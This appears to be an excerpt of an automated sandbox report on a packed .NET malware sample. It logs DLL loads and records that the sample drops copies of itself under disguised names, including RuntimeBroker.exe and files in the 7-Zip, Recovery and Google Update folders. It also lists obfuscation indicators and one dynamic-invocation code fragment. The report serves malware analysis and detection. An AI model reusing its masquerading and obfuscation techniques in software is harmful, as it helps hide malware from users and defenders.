Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: wldp.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: profapi.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: mscoree.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: version.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: wldp.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: profapi.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: sspicli.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: mscoree.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: apphelp.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: version.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: wldp.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: profapi.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: sspicli.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: mscoree.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: version.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: wldp.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: profapi.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: sspicli.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: mscoree.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: apphelp.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: version.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: wldp.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: profapi.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: sspicli.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: mscoree.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: version.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: wldp.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: profapi.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: mscoree.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: version.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: wldp.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: profapi.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: sspicli.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: ktmw32.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: rasapi32.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: rasman.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: rtutils.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: mswsock.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: winhttp.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: iphlpapi.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: dhcpcsvc.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: dnsapi.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: winnsi.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: rasadhlp.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: fwpuclnt.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: secur32.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: schannel.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: wbemcomn.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: amsi.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: userenv.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: dwrite.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: edputil.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: mskeyprotect.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: ntasn1.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: ncrypt.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: ncryptsslp.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: msasn1.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: winmm.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: winmmbase.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: mmdevapi.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: devobj.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: ksuser.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: avrt.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: audioses.dll
Source: C:\Recovery\opHipgZM6eS.exe	Section loaded: powrprof.dll

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Directory created: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe			Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Directory created: C:\Program Files\7-Zip\c743cc6a02740e			Jump to behavior

Source: SfbAu0ICZn.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SfbAu0ICZn.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: SfbAu0ICZn.exe

Static file information: File size 1928192 > 1048576

Source: SfbAu0ICZn.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1d6400

Source: SfbAu0ICZn.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: SfbAu0ICZn.exe, VEv6xAbV5GyJr21qE77.cs

.Net Code: Type.GetTypeFromHandle(FCBBOKmvXbEMajluG1O.hwZ3Y8sSunu(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(FCBBOKmvXbEMajluG1O.hwZ3Y8sSunu(16777245)),Type.GetTypeFromHandle(FCBBOKmvXbEMajluG1O.hwZ3Y8sSunu(16777259))})

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Code function: 0_2_00007FFD9B80476C push ss; iretd	0_2_00007FFD9B804771
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Code function: 0_2_00007FFD9B804712 push edx; iretd	0_2_00007FFD9B804735
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Code function: 0_2_00007FFD9B8056C7 push ebx; iretd	0_2_00007FFD9B8056CA
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Code function: 0_2_00007FFD9B8000AD pushad ; iretd	0_2_00007FFD9B8000C1
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Code function: 0_2_00007FFD9B963D75 push esp; ret	0_2_00007FFD9B963D76
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Code function: 0_2_00007FFD9B9600A1 push ebp; ret	0_2_00007FFD9B9FF229
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Code function: 0_2_00007FFD9B9600A1 push ebp; ret	0_2_00007FFD9B9FF229

Source: SfbAu0ICZn.exe	Static PE information: section name: .text entropy: 7.545799574503469
Source: TMqwtuekPHF.exe.0.dr	Static PE information: section name: .text entropy: 7.545799574503469
Source: lYlhyYPN9gkdqQ.exe.0.dr	Static PE information: section name: .text entropy: 7.545799574503469
Source: RuntimeBroker.exe.0.dr	Static PE information: section name: .text entropy: 7.545799574503469
Source: ctfmon.exe.0.dr	Static PE information: section name: .text entropy: 7.545799574503469

Source: SfbAu0ICZn.exe, qDaXf0usPmn7gLBtinI.cs	High entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'fLDoFyYTIem', 'YASoXoW5A51', 'oKrSZ5odgRaRuEUFPRqW', 'YiwqaoodQGxGZlJD4Hnu', 'o2tpVTodJJFYQpOJHCrj'
Source: SfbAu0ICZn.exe, VyDLwWYGoEaBPh4RLwY.cs	High entropy of concatenated method names: 'ycjYQnO7W6', 'PC5Y2IodF3UwVs9DX13N', 'ADMVd2oduDyTasolro6H', 'SnS72iodkAlGqYlnVoO4', 'tPFrkrod1uSJJbuR27sC', 'U1J', 'P9X', 'Nt8oXP37MHM', 'YUhoX5KQiIc', 'FBsoFkyjosP'
Source: SfbAu0ICZn.exe, IRpyZE3ZXSDjbghsgZp.cs	High entropy of concatenated method names: 'rMD3a3HZDU', 'WuS361QY8A', 'XW9tIuoli5GXWgWAqs5p', 'U6oyr8olfR6IGu6UOIVV', 'tSIGWcolLE6rKqpWTDP8', 'gKIW05oleoE87lf8ugfq', 'liV3WtBhmH', 'tdf4UMol6k6ulgeaarn6', 'MpVUMcolGrjaKBSSYnlf', 's988BmolDtK1nal5s93Q'
Source: SfbAu0ICZn.exe, d5tJlg3JFX6sB8sYdiw.cs	High entropy of concatenated method names: 'bevCkCEWPn', 'YwUOLeolz1SLG30gHPdN', 'BXThroownSZt8wT8tYdy', 'flWKdXowoyKKd5s7kVDU', 'uHbgD9olm9eOlDP4Crlc', 'dwXDnOolplV6etbhoME5', 'ssCC5xow3pTwCGplwKUx', 'Gs5cQYowCPLUJhMXQswr', 'w8VCnKuAct', 'syNC3YUTga'
Source: SfbAu0ICZn.exe, Ux3pEk3YV5QHT2NOOHN.cs	High entropy of concatenated method names: 'uED3kYefSI', 'Gof3Fp0o1e', 'krd31CQslq', 'XPu3y6kgZG', 'bnr7XMolvCa9bZybrsmG', 'mQa3Cyolxu86GbMrJTgk', 'P75MHwolhy5UEHFWK3Gl', 'uG7tIjolIfktaGHxK9Tg', 'KBBtY8olPwRxHNPEr8e9', 'PyXtC7ol5o2BowQILjDl'
Source: SfbAu0ICZn.exe, estjwhe1qFkdF9uiApr.cs	High entropy of concatenated method names: 'PtPeKjoOQI', 't0mqPFoq1b4Ld5SjTDj9', 'NOA7djoqyYTDxe0VUwCM', 'rc8OoWoqkGbsl2pVamdM', 'VjnKbGoqF5Srp239FAEU', 'LrfCCvoqMrXnTOVsETiW', 'IPy', 'method_0', 'method_1', 'method_2'
Source: SfbAu0ICZn.exe, ATbUTpXU2v4yUwhRonm.cs	High entropy of concatenated method names: 'TPsXmATMyW', 'UIjIacoZkDpEXsihGaUA', 'UQJt3HoZFPNN2I9luPDs', 'n5NoTVoZYAk7WpRtoU3O', 'FiX1FsoZuU7SZkbtrxEW', 'DeXDUIoZylFjhKJIxx9o', 'KHIySMoZMO1ldSeeVM9J', 'OTcT28oZxR8RcW46UA9H', 'KlAYuDiQyN', 'oxuB9ooZPd0EB51gxcE8'
Source: SfbAu0ICZn.exe, Gsx05V7qJVV3qL50UxS.cs	High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'Dr0oFhrDWSp', 'BEwoXrVu3Rs', 'j6uutVoDA7WbsdZqfi0V', 'RH4O2ooDOMpse68o2wqA', 'uc9hMCoDNWHqG4Sd91wN', 'QIFVMAoDjbwNckIkGeB7', 'N2KKZuoDKogySgcByMGx'
Source: SfbAu0ICZn.exe, n3nUoH1355ebfAMI0KZ.cs	High entropy of concatenated method names: 'csh1X3FDKL', 'sDs1YmCA52', 'mA51u6rg8q', 'AmV1kM6gjk', 'TBG1FlYLxJ', 'yFA11PSsL2', 'g2D1yAtgjk', 'As71MOEkyV', 'LSv1xey2kV', 'xW71hts3Tf'
Source: SfbAu0ICZn.exe, yeIQR71vNkKsj9Tcoyy.cs	High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'aGYFy0ofd9F4TchCVhIE', 'DlJnCXofHpBSeAeYGwdG', 'LyyrH7ofs7rw0VaOfhPU', 'A5r1P7d9XB'
Source: SfbAu0ICZn.exe, dtnsIvuKSFg4O1RQVA1.cs	High entropy of concatenated method names: 'vqfuZpQPbu', 'h4JPpdodGgKhXOgRy8oh', 'sjcqbtodaPXopvLtsF8l', 'jM4y65od63ifr4M8m98X', 'GqgO0OodtyajZe4Wf3QE', 'nIRiiTodrgxFyC8FY0xm', 'E94', 'P9X', 'vmethod_0', 'zKOoX8hLDpE'
Source: SfbAu0ICZn.exe, rdxhjFLfDtj1Eo9TQGN.cs	High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'oSV2P0o2R6HSRhaNTi5w', 'OEtX4ho2KhjykdqFBMJE', 'pUJxcto24wj7MyLtqxDg'
Source: SfbAu0ICZn.exe, vycZJuFylp0ETSG0swX.cs	High entropy of concatenated method names: 'B6VFxakUSF', 'NqcFhjtg5f', 'StrFvRfOcl', 'LY7rMNosO4apHFlCPPe3', 'wPcBinosNINxtdIpHdKg', 'YwQhiSos8CAE8DFrp45e', 'SSerkHosA1aBHDD7hbAR', 'vLoUtuosjyPNqVNJqLSH', 'MtpsRXosKCMkv9tKVqdD', 'YAnHTaos4YKQNvrEm2Tp'
Source: SfbAu0ICZn.exe, veMOXsHftvlVH90GoKi.cs	High entropy of concatenated method names: 'Close', 'qL6', 'aiTHirbgFe', 'pWHHehvr3s', 'diRHUkNYNN', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
Source: SfbAu0ICZn.exe, I0493TY11ewmCyJXvUB.cs	High entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'tVWoFYVvtrL', 'YASoXoW5A51', 'eJkbAkoZ8kBri8E5FZsK', 'bBND79oZAPoJ5rttlwtt', 'u56fYIoZOq9cs3pZaDJZ', 'JXRUM9oZNXVowbWL5LK4'
Source: SfbAu0ICZn.exe, M5rY8jFEM3Zb72UJt6d.cs	High entropy of concatenated method names: 'FGdFwmRcur', 'EZjFTKAdwb', 'jEAFZiFUha', 'QvvFd3iOcp', 'NOOFH5kVnP', 'iWIFsgt85c', 'ld9XPdosBnlgrIEIKfQO', 'qgaa1dosc59i1BS30o30', 'X9D5R6osbEpgGmm2K9Qk', 'JVPbdpos20Xk7OrgiIUc'
Source: SfbAu0ICZn.exe, u5xNOwECIy1aJwKh5Db.cs	High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'UeNEYyFxuZ', 'Write', 'jWXEuIaXyy', 'XUQEkdFHOV', 'Flush', 'vl7'
Source: SfbAu0ICZn.exe, XWc6IXRMkf3PVtaf9dX.cs	High entropy of concatenated method names: 'TgdRhOX0Sk', 'YTURvrPK3Y', 'lCCRIFebKL', 'daQRPRgg0M', 'VCmR5Z5AlD', 'Ut1ByYorFVlM3FhRuwIp', 'dpuTeforuscKNXGkS4cH', 'HCODS3ork6nfkvQk2dDl', 'ac1munor1Kn5NfWwpbva', 'knBBX9ory2jupPsds7ny'
Source: SfbAu0ICZn.exe, YyyT15o91lmnMoS4nBW.cs	High entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'ccbokz1pLyT', 'YASoXoW5A51', 'KMGnwwoE8dYStQN24uJr', 'jOfJfNoEANGjJsRXhLLx'
Source: SfbAu0ICZn.exe, eglMBKcZSDeWB5KbI6u.cs	High entropy of concatenated method names: 'AMhcH8S1Fn', 'ldQcsL8O8X', 'iZVcfycIg1', 'iWUcLVv1vc', 'Dispose', 'IwHVtFo07ixkf4jmlBTL', 'TUsw3Xo0VGtr53qA7Iqw', 'G0fqkFo09VwrJojWIHcK', 'o4hdEdo08E7we1yB6haX', 'wWppcco0AZ476jh7wFGs'
Source: SfbAu0ICZn.exe, CSXHM17eBL809kkR8pL.cs	High entropy of concatenated method names: 'VjG7rrPHRK', 'rI37WCuSWr', 'cqD7gTxt7b', 'rb06cgoDvWXAjJXqqcmD', 'yg2enroDxXTN3cmZYYiv', 'mywElKoDhe84pW9dgwyF', 'E0M7DS9L3b', 'SGZ7aUFYcB', 'Vx376rZSi1', 'WqIRQkoDkKb0SVJfVkc3'
